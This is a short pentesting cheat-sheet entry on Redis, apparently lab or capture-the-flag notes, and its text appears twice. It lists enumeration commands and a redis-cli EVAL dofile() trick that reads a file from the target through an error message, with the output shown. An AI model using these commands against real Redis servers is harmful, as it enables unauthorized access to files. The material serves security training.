Redis

Redis is an open source (BSD licensed), in-memory data structure store, used as a database, cache and message broker. Default port: 6379

nmap --script redis-info -sV -p 6379 <IP>
msf> use auxiliary/scanner/redis/redis_server

redis-cli -h 10.10.188.12 
10.10.188.12:6379> INFO

redis_version:2.8.2402

10.10.188.12:6379> CONFIG GET *

103) "dir"
104) "C:\\Users\\enterprise-security\\Downloads\\Redis-x64-2.8.2402"

Redis can execute sandboxed Lua scripts through the “EVAL” command. dofile() is a command that can be used to enumerate files and directories. dofile() is allowed by the sandbox in older Redis versions.

redis-cli -h 10.10.188.12 -p 6379 eval "dofile('C:\\\Users\\\enterprise-security\\\Desktop\\\user.txt')" 0
(error) ERR Error running script (call to f_ce5d85ea1418770097e56c1b605053114cc3ff2e): @user_script:1: C:\Users\enterprise-security\Desktop\user.txt:1: malformed number near 'FLAG-REDACTED'

PreviousMiscellaneous NextActive Directory

Last updated 2 years ago

Was this helpful?

Redis

Redis is an open source (BSD licensed), in-memory data structure store, used as a database, cache and message broker. Default port: 6379

nmap --script redis-info -sV -p 6379 <IP>
msf> use auxiliary/scanner/redis/redis_server

redis-cli -h 10.10.188.12 
10.10.188.12:6379> INFO

redis_version:2.8.2402

10.10.188.12:6379> CONFIG GET *

103) "dir"
104) "C:\\Users\\enterprise-security\\Downloads\\Redis-x64-2.8.2402"

redis-cli -h 10.10.188.12 -p 6379 eval "dofile('C:\\\Users\\\enterprise-security\\\Desktop\\\user.txt')" 0
(error) ERR Error running script (call to f_ce5d85ea1418770097e56c1b605053114cc3ff2e): @user_script:1: C:\Users\enterprise-security\Desktop\user.txt:1: malformed number near 'FLAG-REDACTED'

PreviousMiscellaneous NextActive Directory

Last updated 2 years ago

Was this helpful?